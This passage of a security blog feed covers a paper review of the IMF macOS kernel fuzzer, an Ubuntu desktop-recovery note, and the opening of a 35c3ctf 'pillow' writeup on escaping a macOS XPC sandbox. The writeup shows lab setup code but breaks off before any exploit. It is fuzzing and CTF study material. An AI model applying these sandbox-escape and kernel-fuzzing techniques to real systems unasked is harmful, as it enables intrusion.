class="punctuation">:</span><span class="number">0x1</span><span class="punctuation">,</span> &#x27;data&#x27;<span class="punctuation">:</span><span class="punctuation">[</span><span class="punctuation">]</span><span class="punctuation">&#125;</span></span><br><span class="line">      is_input <span class="punctuation">:</span> False<span class="punctuation">,</span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>之后，程序将所有读入的 API log 均存入 ApiFuzz 类中的 apisets 数组，并使用该数组创建 Model 类进行建模。有意思的是，在建模时，只会使用一个 log 文件。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Model</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, apisets</span>):</span><br><span class="line">        <span class="variable language_">self</span>.mapis = []</span><br><span class="line">        <span class="keyword">for</span> idx <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(apisets[<span class="number">0</span>])):</span><br><span class="line">            apilog = apisets[<span class="number">0</span>][idx]</span><br><span class="line">            <span class="variable language_">self</span>.mapis.append(Mapi(apilog, idx))</span><br><span class="line">        <span class="variable language_">self</span>.check_const(apisets)</span><br><span class="line">        <span class="variable language_">self</span>.add_dataflow(apisets)</span><br></pre></td></tr></table></figure><p>Model 类在初始化时，会将每个 apilog 都转换成 Mapi 类型的结构。 该结构的布局和 Api 类型有点类似：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">Mapi = <span class="punctuation">&#123;</span></span><br><span class="line">    api <span class="punctuation">:</span> Api(arglog.api)</span><br><span class="line">    idx <span class="punctuation">:</span> xx<span class="punctuation">,</span></span><br><span class="line">    il <span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">    &#x27;masterPort&#x27;<span class="punctuation">:</span> Marg(派生自 Arg) <span class="punctuation">&#123;</span></span><br><span class="line">      arg <span class="punctuation">:</span> arglog.arg<span class="punctuation">,</span></span><br><span class="line">          value <span class="punctuation">:</span> Mval <span class="punctuation">&#123;</span></span><br><span class="line">                value <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">              const <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">                dataflow = xxx<span class="punctuation">,</span></span><br><span class="line">              raw <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">              ori <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">              ty <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">              ptr <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">              name <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">            <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">            is_in_flag <span class="punctuation">:</span> 数据流是否是流进</span><br><span class="line">      name <span class="punctuation">:</span> arg的名称</span><br><span class="line">            </span><br><span class="line">            array_flag <span class="punctuation">:</span> 表示该arg是否是一个指向数组的指针</span><br><span class="line">            data <span class="punctuation">:</span> 如果当前arg 是数组，则这里存放数组中的内容</span><br><span class="line">            cnt <span class="punctuation">:</span> 表示当 arg 是数组类型时的长度</span><br><span class="line">        <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    ol <span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        .....</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>转换完成后，立即执行 check const 操作，尝试分辨出是否是常量值。若参数类型是<strong>指针</strong>类型，则程序会单独对指针所指向数组中的每一个元素进程 check const 操作；若参数是<strong>非指针</strong>类型，则对该参数的数值进行 check const 检查。</p><p>check const 检查操作相当的简单：<strong>如果第 i 个函数调用的第 j 个参数，在筛选出的 api log 中互不相同，则说明这是一个变量值。</strong></p><p>check const 检查完成后，下一步操作是  add dataflow。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">add_dataflow</span>(<span class="params">self, apisets</span>):</span><br><span class="line">    <span class="keyword">for</span> apiset <span class="keyword">in</span> apisets:</span><br><span class="line">        before = &#123;&#125;</span><br><span class="line">        <span class="keyword">for</span> idx <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(apiset)):</span><br><span class="line">            apilog = apiset[idx]</span><br><span class="line">            mapi =<span class="variable language_">self</span>.mapis[idx]</span><br><span class="line">            mapi.add_dataflow(before, apilog)</span><br><span class="line">            update_before(before, apilog, mapi, idx)</span><br></pre></td></tr></table></figure><p>初始时，add dataflow 函数声明了一个 before 字段，该字段表示过去函数调用所生成的 value 值。之后将每个 Mapi 中 Marg 的参数值加入至 Mval 类型中的 raw 数组中，最后调用 get_xxx_df 函数来更新 Mval 类中的 dataflow 字段，指定该 Mval 的数据流来源。</p><p>这样，通过多次遍历 apilog，程序可以对一些 Mval 设置其数据流的单项关系，为接下来代码生成做准备。</p><h3 id="3-Fuzzer">3. Fuzzer</h3><h4 id="a-Fuzz-配置">a. Fuzz 配置</h4><p>fuzz 的配置主要有以下几种：</p><ol><li>T : 超时时间</li><li>I : 迭代次数</li><li>P : 变异概率</li><li>F : 固定位数，用于变异</li><li>R : 随机数种子。</li></ol><p>实际开源的代码模板如下所示，注意到这里并没有关于超时时间的设置，这可能是因为这部分代码没有开源：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">parse_args</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv)</span></span>&#123;</span><br><span class="line">    <span class="type">int</span> opt;</span><br><span class="line">    <span class="keyword">while</span> ((opt = <span class="built_in">getopt</span>(argc, argv, <span class="string">&quot;f:s:b:r:l:&quot;</span>)) != <span class="number">-1</span>)&#123;</span><br><span class="line">        <span class="keyword">switch</span>(opt)&#123;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;f&#x27;</span>:</span><br><span class="line">                log_file = optarg;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;s&#x27;</span>:</span><br><span class="line">                seed = <span class="built_in">parse_uint</span>(optarg);</span><br><span class="line">                set_seed = <span class="number">1</span>;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;b&#x27;</span>:</span><br><span class="line">                bitlen = <span class="built_in">parse_uint</span>(optarg);</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;r&#x27;</span>:</span><br><span class="line">                rate = <span class="built_in">parse_uint</span>(optarg);</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;l&#x27;</span>:</span><br><span class="line">                max_loop = <span class="built_in">parse_uint</span>(optarg);</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="keyword">default</span> :</span><br><span class="line">                <span class="built_in">help</span>();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(log_file == <span class="literal">NULL</span> &amp;&amp; set_seed == <span class="number">0</span>)&#123;</span><br><span class="line">        <span class="built_in">help</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="b-变异策略">b. 变异策略</h4><p>变异策略较为简略，只有参数值变异：对其进行数据上的变异。</p><p>这些变异代码都是预先写死在 python 文件中，作为代码模板的一部分，以下是简单的代码模板示例：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">uint16_t</span> <span class="title">mut_short</span><span class="params">(<span class="type">uint16_t</span> v)</span></span>&#123;</span><br><span class="line">  <span class="type">uint16_t</span> r ;</span><br><span class="line">  <span class="keyword">if</span>( MAYBE )&#123;</span><br><span class="line">    r= <span class="built_in">get_rand</span>();</span><br><span class="line">    <span class="keyword">if</span>(bitlen &lt;<span class="number">16</span>)&#123;</span><br><span class="line">      <span class="keyword">return</span> v ^ (r &amp; ((<span class="number">1</span> &lt;&lt; (<span class="number">16</span>-bitlen))<span class="number">-1</span>) ); </span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">      <span class="keyword">return</span> v ^ (r &amp; <span class="number">1</span>) ;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> v;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">uint32_t</span> <span class="title">mut_int</span><span class="params">(<span class="type">uint32_t</span> v)</span></span>&#123;</span><br><span class="line">  <span class="type">uint32_t</span> r =<span class="number">0</span>;</span><br><span class="line">  <span class="keyword">if</span>( MAYBE )&#123;</span><br><span class="line">    r = (r&lt;&lt;<span class="number">16</span>) | (<span class="type">uint32_t</span>) <span class="built_in">get_rand</span>();</span><br><span class="line">    r = (r&lt;&lt;<span class="number">16</span>) | (<span class="type">uint32_t</span>) <span class="built_in">get_rand</span>();</span><br><span class="line">    <span class="keyword">if</span>(bitlen &lt;<span class="number">32</span>)&#123;</span><br><span class="line">      <span class="keyword">return</span> v ^ (r &amp; ((<span class="number">1</span> &lt;&lt; (<span class="number">32</span>-bitlen))<span class="number">-1</span>) ); </span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">      <span class="keyword">return</span> v ^ (r &amp; <span class="number">1</span>) ;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> v;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="五、评估">五、评估</h2><ul><li><p>IMF 在 macOS 中找到了相当多的 kernel panic 样例。其中大部分是 DoS，有一些可以尝试进行利用。</p></li><li><p>对于不同类型的目标程序，其能起到 fuzz 的效果是不同的。这是因为不同类型的目标程序，所调用的 IOKit 函数侧重点也不相同。</p><p><img src="/2022/01/IMF/image-20220121184714950.png" alt="image-20220121184714950"></p><p>通过该图我们可以看到，Game 类型的目标程序所产生的 Api Log，被 IMF 读入并用于 fuzz macos 所触发的 kernel panic 最多，但该程序类型却并不是触发内核覆盖率最广的类型。这也可以看到 IMF 极度依赖于执行目标程序所收集到的Api Log。</p></li><li><p>IMF 精度会受到 N 的影响。对于不同 N ，fuzz 的精度会产生一些波动：</p><p><img src="/2022/01/IMF/image-20220121185131190.png" alt="image-20220121185131190"></p></li></ul><h2 id="六、不足之处">六、不足之处</h2><ul><li>IMF 的工作建立在那些<strong>参数类型非常明确的 syscall API</strong>，更侧重于以黑盒方式对参数进行变异，而不会了解每个参数的有效内存范围。</li><li>IMF 的前提是了解每个系统调用规范的定义，但这对于驱动程序来说并不适合。因为对于驱动程序来说，其参数多以 <code>void*</code> 传递，IMF 无法根据该无类型指针建立显式数据流依赖关系。</li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;内核 API 函数之间的调用大多是相互依赖的，即一些 API 的调用需要依赖其他 API 调用所产生的上下文，因此若给定的调用上下文无用，则内核 API 将会始终执行失败，无法进入到更深层次的逻辑中。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;这篇论文提出了一种新的内核 fuzz 方式，它利用内核 API 函数之间的依赖（即 API 调用序列的相似性），来推断出依赖模型，进而利用该模型生成出&lt;strong&gt;随机并且结构性良好的 API 序列&lt;/strong&gt;，进行更深层次的 fuzz。&lt;/p&gt;
&lt;p&gt;其中，API 调用的依赖关系包含两种，分别是&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;顺序依赖，即 A 函数应该比 B 函数更早被调用。&lt;/li&gt;
&lt;li&gt;数据依赖，函数调用之间存在着数据流传递。&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Fuzz 的主要目标是 &lt;strong&gt;IOKit Lib&lt;/strong&gt;。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;IMF src - &lt;a href=&quot;https://github.com/SoftSec-KAIST/IMF&quot;&gt;github&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;需要注意的是，这篇论文是 17 年的论文，实验时所使用的 MacOS 版本为 10.12.3，而本人的机器版本为 MacOS 12.0.1，因此在复现实验是会存在一些困难。&lt;/p&gt;
&lt;/blockquote&gt;</summary>
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="fuzz" scheme="https://kiprey.github.io/tags/fuzz/"/>
    
  </entry>
  
  <entry>
    <title>Ubuntu 恢复图形界面记录</title>
    <link href="https://kiprey.github.io/2022/01/ubuntu_desktop_recover/"/>
    <id>https://kiprey.github.io/2022/01/ubuntu_desktop_recover/</id>
    <published>2022-01-17T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.169Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、背景">一、背景</h2><p>给 npy 安装环境时，误删了她的 ubuntu python3，导致重启 ubuntu 后无法进入图形界面，花了两个小时的时间才解决。</p><p>这里简单记录一下恢复图形界面的操作。</p><span id="more"></span><h2 id="二、图形界面恢复">二、图形界面恢复</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">################# 尝试联网 #################</span></span><br><span class="line"><span class="comment"># 命令行界面默认不联网，因此需要手动连网</span></span><br><span class="line"><span class="built_in">sudo</span> dhclient eth0</span><br><span class="line"><span class="comment"># 失败的话，查看网卡名称</span></span><br><span class="line">dmesg | grep eth</span><br><span class="line"><span class="comment"># 发现eth0被重命名成了exxx0，重新联网</span></span><br><span class="line"><span class="built_in">sudo</span> dhclient exxx0</span><br><span class="line"></span><br><span class="line"><span class="comment">################# 配置终端中文支持 #################</span></span><br><span class="line"><span class="comment"># 下载zhcon</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get install zhcon    </span><br><span class="line"><span class="comment"># 设置UTF8编码</span></span><br><span class="line"><span class="built_in">sudo</span> zhcon --utf8                          </span><br><span class="line"></span><br><span class="line"><span class="comment">################# 修补其余的依赖 #################</span></span><br><span class="line"><span class="comment"># 先修补其余的依赖，通常正常情况下这里是不会有什么包需要额外安装的</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get update  </span><br><span class="line"><span class="built_in">sudo</span> dpkg --configure -a </span><br><span class="line"><span class="built_in">sudo</span> apt-get install --fix-missing</span><br><span class="line"></span><br><span class="line"><span class="comment">################# 重新安装图形界面 #################</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get install --reinstall ubuntu-desktop </span><br><span class="line"><span class="comment"># 安装完成后将会自动加载图形界面</span></span><br></pre></td></tr></table></figure><p>如果仍然不行，则继续执行以下命令试试：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install ubuntu-minimal ubuntu-standard ubuntu-desktop</span><br><span class="line"><span class="built_in">sudo</span> apt install nautilus-extension-gnome-terminal</span><br><span class="line"><span class="built_in">sudo</span> reboot</span><br></pre></td></tr></table></figure><h2 id="三、网络连接恢复">三、网络连接恢复</h2><ol><li><p>首先，设置 <code>/etc/NetworkManager/NetworkManager.conf</code> 中的 <code>managed</code> 选项为 true，由图形界面的网络管理器 NetworkManager 来接管网络连接。</p><blockquote><p>注意 Network Manager 是 Desktop 版本下的网络管理器；而 /etc/network/interfaces 是 Server 版本下的网络管理器。</p><p><strong>二者不可同时使用！</strong></p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[ifupdown]</span><br><span class="line">managed=<span class="literal">true</span></span><br></pre></td></tr></table></figure></li><li><p>之后，备份并清空 <code>/usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf</code> 文件，重启 Network Manager 服务。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> <span class="built_in">mv</span> /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf  /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf_orig</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">touch</span> /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf</span><br><span class="line"></span><br><span class="line"><span class="built_in">sudo</span> service network-manager restart</span><br></pre></td></tr></table></figure><p>此时 ifconfig 中将显示有线网卡，nmcli 中也会显示对应的有线网卡<strong>已连接至有线连接</strong>。可以 ping 114.114.114.114，但是<strong>无法解析任何网址</strong>。</p></li><li><p>点击 ubuntu 图形界面右上角的<strong>有线网络</strong>，手动设置 DNS 为 <code>114.114.114.114</code>，之后在终端重启 Network Manager 服务后即可。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> service network-manager restart</span><br></pre></td></tr></table></figure></li></ol><h2 id="四、参考链接">四、参考链接</h2><ul><li><p><a href="https://blog.csdn.net/dragonstrong/article/details/120739061">ubuntu误删图形界面一直进tty - CSDN</a></p></li><li><p><a href="https://blog.csdn.net/weixin_39585035/article/details/110626057">ubuntu 卸载python后无法进入图形界面_解决Ubuntu删除/升级Python无法进入桌面以及控制台乱码问题… - CSDN</a></p></li><li><p><a href="https://blog.csdn.net/codingpy/article/details/103144663">删除系统 Python 引发的惨案 - CSDN</a></p></li><li><p><a href="https://askubuntu.com/questions/882806/ethernet-device-not-managed">Ethernet device not managed - askubuntu</a></p></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、背景&quot;&gt;一、背景&lt;/h2&gt;
&lt;p&gt;给 npy 安装环境时，误删了她的 ubuntu python3，导致重启 ubuntu 后无法进入图形界面，花了两个小时的时间才解决。&lt;/p&gt;
&lt;p&gt;这里简单记录一下恢复图形界面的操作。&lt;/p&gt;</summary>
    
    
    
    
  </entry>
  
  <entry>
    <title>35c3ctf pillow Writeup</title>
    <link href="https://kiprey.github.io/2022/01/35c3ctf_pillow/"/>
    <id>https://kiprey.github.io/2022/01/35c3ctf_pillow/</id>
    <published>2022-01-07T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.730Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><ul><li><p><code>pillow</code>，是 35c3ctf 中的一道关于 macOS bootstrap Service 沙箱逃逸题目。本人将通过学习这一题来进一步了解Mac OSX XPC 和 Sandbox 机制。</p></li><li><p>该题中包含了两个自定义 macOS 系统服务。要求攻击者劫持两个 XPC 服务之间的 IPC 连接，以达到沙箱逃逸的目的。</p></li><li><p>题目链接 ： <a href="https://github.com/saelo/35c3ctf/tree/master/pillow">pillow - 35c3ctf github</a></p></li></ul><span id="more"></span><h2 id="二、环境搭建">二、环境搭建</h2><p>在 MacOS 环境下：</p><ul><li><p>编译（可以提前在 Makefile 中添加 <code>-g -O0</code> 编译标志）</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git@github.com:saelo/35c3ctf.git</span><br><span class="line"><span class="built_in">cd</span> 35c3ctf/pillow/capsd</span><br><span class="line">make</span><br><span class="line"><span class="built_in">cd</span> ../shelld</span><br><span class="line">make</span><br></pre></td></tr></table></figure></li><li><p>使用 launchd 启动编译出的两个服务</p><ul><li><p>首先，修改 <code>distrib/System/Library/LaunchDaemons/</code> 中的两个 plist, 将文件中的 <code>Program</code> 条目替换成两个 XPC service 编译出的路径。诸如：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">[...]</span><br><span class="line">&lt;key&gt;Program&lt;/key&gt;</span><br><span class="line">&lt;string&gt;/Users/kiprey/Desktop/CTF/35c3ctf/pillow/capsd/capsd&lt;/string&gt;</span><br><span class="line">[...]</span><br></pre></td></tr></table></figure></li><li><p>之后，令 launchd 启动这两个服务</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:wheel pillow/distrib/System/Library/LaunchDaemons/*.plist</span><br><span class="line"><span class="built_in">sudo</span> launchctl bootstrap system pillow/distrib/System/Library/LaunchDaemons/*.plist</span><br></pre></td></tr></table></figure></li><li><p>如果要关闭服务则可以执行</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> launchctl bootout system pillow/distrib/System/Library/LaunchDaemons/*.plist</span><br></pre></td></tr></table></figure></li></ul><blockquote><p>可以通过 <code>log show --predicate 'processID == 1' --last 1h</code> 来查看 launchd 的输出信息。</p></blockquote></li><li><p>配置执行 exploit 程序环境</p><p>题目已经说明 exploit <strong>位于沙箱</strong>中，因此这里也模拟一下。</p><ul><li><p>首先找到 exploit 所使用的沙箱配置文件，这个文件位于 <code>pillow/exploit/exploit.sb</code>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">(version <span class="number">1</span>)</span><br><span class="line">(deny <span class="keyword">default</span>)</span><br><span class="line"></span><br><span class="line">(<span class="keyword">import</span> <span class="string">&quot;system.sb&quot;</span>)</span><br><span class="line"></span><br><span class="line">; <span class="function">TODO enter correct path <span class="title">here</span></span></span><br><span class="line"><span class="function"><span class="params">(allow process-exec (literal (param <span class="string">&quot;EXPLOIT_BIN&quot;</span>)))</span></span></span><br><span class="line"><span class="function"><span class="params">(allow process-fork)</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"><span class="params">(allow mach-lookup (global-name <span class="string">&quot;net.saelo.shelld&quot;</span>))</span></span></span><br><span class="line"><span class="function"><span class="params">(allow mach-lookup (global-name <span class="string">&quot;net.saelo.capsd&quot;</span>))</span></span></span><br><span class="line"><span class="function"><span class="params">(allow mach-lookup (global-name <span class="string">&quot;net.saelo.capsd.xpc&quot;</span>))</span></span></span><br></pre></td></tr></table></figure><p>这里的沙箱配置只允许 <strong>fork</strong>、<strong>exec exploit</strong> 以及 <strong>mach lookup</strong> 题目所提供的三个服务。</p></li><li><p>之后使用以下命令执行 exploit</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 注：传入的 EXPLOIT_BIN 路径必须为 **绝对** 路径</span></span><br><span class="line">sandbox-exec -f ./exploit.sb -D EXPLOIT_BIN=/Users/kiprey/Desktop/CTF/35c3ctf/pillow/exploit/myexploit ./myexploit</span><br></pre></td></tr></table></figure><p>这样，一个不符合沙箱限制的操作将会被拒绝：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] Try running /bin/ls, this operation must be denied!\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> path[] = <span class="string">&quot;/bin/ls&quot;</span>;</span><br><span class="line">    <span class="type">char</span> arg1[] = <span class="string">&quot;/&quot;</span>;</span><br><span class="line">    <span class="type">char</span> * <span class="type">const</span> exec_argv [] = &#123; path, arg1, <span class="literal">NULL</span> &#125;;</span><br><span class="line">    <span class="type">char</span> * <span class="type">const</span> exec_env [] = &#123; <span class="literal">NULL</span> &#125;;</span><br><span class="line">    <span class="built_in">execve</span>(path, exec_argv, exec_env);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">perror</span>(<span class="string">&quot;myexploit-execve&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>运行结果：</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108155133031.png" alt="image-20220108155133031"></p></li></ul></li><li><p>设置 flag 类型，使普通用户不可读（可选），这一步只是做个简单的测试，没有什么实际意义</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:wheel ./flag</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chmod</span> 640 ./flag</span><br></pre></td></tr></table></figure><p>但需要注意的是，<strong>被 launchd 启动的守护进程是可以读取这个高权限 flag 的</strong>。</p><p>以下是用于验证的代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">FILE* flag = <span class="built_in">fopen</span>(<span class="string">&quot;/Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag&quot;</span>, <span class="string">&quot;r&quot;</span>);</span><br><span class="line"><span class="type">char</span> buf[<span class="number">100</span>];</span><br><span class="line"><span class="type">size_t</span> len = <span class="built_in">fread</span>(buf, <span class="number">1</span>, <span class="built_in">sizeof</span>(buf), flag);</span><br><span class="line"><span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;flag read len: %zu, flag: 